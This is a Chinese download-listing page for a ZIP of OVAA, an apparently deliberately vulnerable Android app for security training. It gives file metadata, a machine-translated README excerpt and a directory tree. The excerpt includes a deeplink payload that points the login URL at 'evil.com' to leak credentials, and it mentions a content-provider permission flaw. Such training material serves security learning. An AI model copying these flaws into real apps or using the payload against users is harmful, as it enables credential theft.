【文件属性】：
文件名称：ovaa:过度安全的易受攻击的Android应用程序
文件大小：159KB
文件格式：ZIP
更新时间：2021-04-13 20:10:59
android-security mobile-security appsec vulnerable-application vulnerable-android-apps 描述 OVAA（Oversecured Vulnerable Android App）是一个Android应用程序，它汇总了该平台的所有已知和流行的安全漏洞。 漏洞清单 本节仅包括漏洞列表，而没有详细的描述或概念证明。 OVAA的示例将在上得到详细的检查和分析。 通过login_url deeplink安装任意的login_url oversecured://ovaa/login?url=http://evil.com/ 。 导致用户登录时泄露其用户名和密码。 通过oversecured://ovaa/grant_uri_permissions获得对任意内容提供程序（未导出，但具有android:grantUriPermissions="true" ）的oversecured://ovaa/grant_uri_permissions 。 攻击者的应用程序需要处理oversecured.
【文件预览】：
ovaa-master
----gradlew.bat(2KB)
----gradlew(5KB)
----gradle.properties(1KB)
----LICENSE(1KB)
----app()
--------src()
--------.gitignore(7B)
--------CMakeLists.txt(771B)
--------build.gradle(776B)
----gradle()
--------wrapper()
----.idea()
--------codeStyles()
--------gradle.xml(748B)
--------runConfigurations.xml(564B)
--------misc.xml(515B)
--------jarRepositories.xml(1KB)
--------vcs.xml(167B)
--------.name(34B)
----.gitignore(232B)
----README.md(3KB)
----settings.gradle(69B)
----build.gradle(421B)